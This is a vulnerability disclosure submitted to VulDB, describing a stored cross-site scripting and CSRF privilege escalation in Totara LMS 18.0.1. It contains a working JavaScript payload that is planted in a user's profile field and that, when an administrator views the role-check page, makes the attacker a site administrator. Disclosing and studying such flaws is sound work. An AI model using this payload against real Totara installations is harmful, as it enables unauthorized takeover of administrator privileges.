Submit #314381: Totara Totara LMS Totara 18.0.1 (Build: 20231128.01) Privileges Scalationinfo

TitleTotara Totara LMS Totara 18.0.1 (Build: 20231128.01) Privileges Scalation
Description# Exploit Title: CSRF Privileges Scalation Totara 18.0.1 # Date: 2024-04-10 # Author: Patricio Alejandro Moraga Abarca (RREEDD) and Juan Carlos Garcés Bernt (DeBobiPro) # Category : webapps # Tested on: Totara 18.0.1 (Build: 20231128.01) # Proof Of Concept: 1. In your user profile modify the "ID Number" variable by entering the payload. 2. The payload will be executed by the administrator when visiting the site "admin/roles/check.php", making the profile defined in the administrator payload. # Payload <script>const http = new XMLHttpRequest();"POST", "/admin/roles/admins.php", false); http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); http.send("confirmadd=<USER ID>&sesskey="+M.cfg.sesskey);</script> #The <USER ID> field must be modified by the value of your user. #The variable "sesskey", is unique to each login, so we get it dynamically with the call to the object "M.cfg.sesskey".
Submission2024-04-10 19:35 (2 months ago)
Moderation2024-04-17 18:58 (7 days later)
VulDB Entry261369

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